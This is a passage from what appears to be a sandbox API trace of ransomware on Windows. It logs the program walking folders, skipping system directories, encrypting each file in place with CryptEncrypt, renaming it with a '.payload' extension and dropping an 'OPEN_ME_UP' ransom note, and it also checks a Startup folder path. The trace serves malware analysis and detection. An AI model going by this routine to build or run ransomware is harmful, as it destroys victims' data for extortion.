dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.325] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.325] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.325] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 49 [0060.325] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0060.325] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.325] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.325] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.325] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.325] GetTickCount () returned 0x114f82c [0060.325] GetTickCount () returned 0x114f82c [0060.325] GetTickCount () returned 0x114f82c [0060.325] GetTickCount () returned 0x114f82c [0060.325] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.325] GetProcessHeap () returned 0x5e0000 [0060.325] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.326] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.327] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.327] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.328] GetProcessHeap () returned 0x5e0000 [0060.328] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.328] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.328] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.328] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.328] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.328] CloseHandle (hObject=0x438) returned 1 [0060.329] GetProcessHeap () returned 0x5e0000 [0060.329] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.329] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0060.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0060.330] GetProcessHeap () returned 0x5e0000 [0060.330] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.330] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.330] FindClose (in: hFindFile=0x606220 | out: hFindFile=0x606220) returned 1 [0060.330] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.330] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\3082\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.330] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0060.331] CloseHandle (hObject=0x430) returned 1 [0060.331] GetProcessHeap () returned 0x5e0000 [0060.331] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.331] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Client", cAlternateFileName="")) returned 1 [0060.331] lstrcmpiW (lpString1="Client", lpString2="Windows") returned -1 [0060.331] lstrcmpiW (lpString1="Client", lpString2="$Recycle.bin") returned 1 [0060.331] lstrcmpiW (lpString1="Client", lpString2="System Volume Information") returned -1 [0060.331] lstrcmpiW (lpString1="Client", lpString2="Program Files") returned -1 [0060.331] lstrcmpiW (lpString1="Client", lpString2="Program Files (x86)") returned -1 [0060.331] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client") returned 32 [0060.332] lstrcmpW (lpString1="Client", lpString2=".") returned 1 [0060.332] lstrcmpW (lpString1="Client", lpString2="..") returned 1 [0060.332] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\Client", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.332] GetProcessHeap () returned 0x5e0000 [0060.332] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.332] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\*") returned 34 [0060.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6062a0 [0060.332] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.332] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.332] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.332] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.332] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.332] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\.") returned 34 [0060.332] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.333] FindNextFileW (in: hFindFile=0x6062a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.333] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.333] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.333] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.333] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.333] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.333] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\..") returned 35 [0060.333] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.333] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.333] FindNextFileW (in: hFindFile=0x6062a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0060.333] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Windows") returned -1 [0060.333] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="$Recycle.bin") returned 1 [0060.333] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="System Volume Information") returned -1 [0060.333] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Program Files") returned -1 [0060.333] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Program Files (x86)") returned -1 [0060.333] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 50 [0060.333] StrStrIW (lpFirst="Parameterinfo.xml", lpSrch=".payload") returned 0x0 [0060.333] lstrcmpW (lpString1="Parameterinfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.333] lstrcmpW (lpString1="Parameterinfo.xml", lpString2="taridd") returned -1 [0060.333] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.333] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.333] GetTickCount () returned 0x114f82c [0060.333] GetTickCount () returned 0x114f82c [0060.333] GetTickCount () returned 0x114f82c [0060.333] GetTickCount () returned 0x114f82c [0060.333] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.333] GetProcessHeap () returned 0x5e0000 [0060.334] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.334] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.336] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.336] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.336] GetProcessHeap () returned 0x5e0000 [0060.336] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.336] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.336] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.337] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.337] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.337] CloseHandle (hObject=0x438) returned 1 [0060.342] GetProcessHeap () returned 0x5e0000 [0060.342] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.342] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml_r00t_{nhhHyu}.payload") returned 72 [0060.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml_r00t_{nhhhyu}.payload")) returned 1 [0060.343] GetProcessHeap () returned 0x5e0000 [0060.343] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.343] FindNextFileW (in: hFindFile=0x6062a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0060.343] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Windows") returned -1 [0060.343] lstrcmpiW (lpString1="UiInfo.xml", lpString2="$Recycle.bin") returned 1 [0060.343] lstrcmpiW (lpString1="UiInfo.xml", lpString2="System Volume Information") returned 1 [0060.343] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files") returned 1 [0060.343] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files (x86)") returned 1 [0060.343] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 43 [0060.343] StrStrIW (lpFirst="UiInfo.xml", lpSrch=".payload") returned 0x0 [0060.343] lstrcmpW (lpString1="UiInfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.343] lstrcmpW (lpString1="UiInfo.xml", lpString2="taridd") returned 1 [0060.343] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.344] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.344] GetTickCount () returned 0x114f83c [0060.344] GetTickCount () returned 0x114f83c [0060.344] GetTickCount () returned 0x114f83c [0060.344] GetTickCount () returned 0x114f83c [0060.344] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.344] GetProcessHeap () returned 0x5e0000 [0060.344] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.345] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.346] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.346] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.347] GetProcessHeap () returned 0x5e0000 [0060.347] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.347] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.347] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.347] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.347] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.347] CloseHandle (hObject=0x438) returned 1 [0060.348] GetProcessHeap () returned 0x5e0000 [0060.348] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.348] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml_r00t_{nhhHyu}.payload") returned 65 [0060.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml_r00t_{nhhhyu}.payload")) returned 1 [0060.349] GetProcessHeap () returned 0x5e0000 [0060.349] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.349] FindNextFileW (in: hFindFile=0x6062a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0060.349] FindClose (in: hFindFile=0x6062a0 | out: hFindFile=0x6062a0) returned 1 [0060.349] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 64 [0060.349] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\client\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.351] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0060.352] CloseHandle (hObject=0x430) returned 1 [0060.352] GetProcessHeap () returned 0x5e0000 [0060.352] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.352] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0060.352] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="Windows") returned -1 [0060.352] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="$Recycle.bin") returned 1 [0060.352] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="System Volume Information") returned -1 [0060.352] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="Program Files") returned -1 [0060.353] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="Program Files (x86)") returned -1 [0060.353] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 42 [0060.353] StrStrIW (lpFirst="DHtmlHeader.html", lpSrch=".payload") returned 0x0 [0060.353] lstrcmpW (lpString1="DHtmlHeader.html", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.353] lstrcmpW (lpString1="DHtmlHeader.html", lpString2="taridd") returned -1 [0060.353] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.353] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.353] GetTickCount () returned 0x114f83c [0060.353] GetTickCount () returned 0x114f83c [0060.353] GetTickCount () returned 0x114f83c [0060.353] GetTickCount () returned 0x114f83c [0060.353] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0060.353] GetProcessHeap () returned 0x5e0000 [0060.353] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0060.353] ReadFile (in: hFile=0x430, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0060.355] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.355] WriteFile (in: hFile=0x430, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) 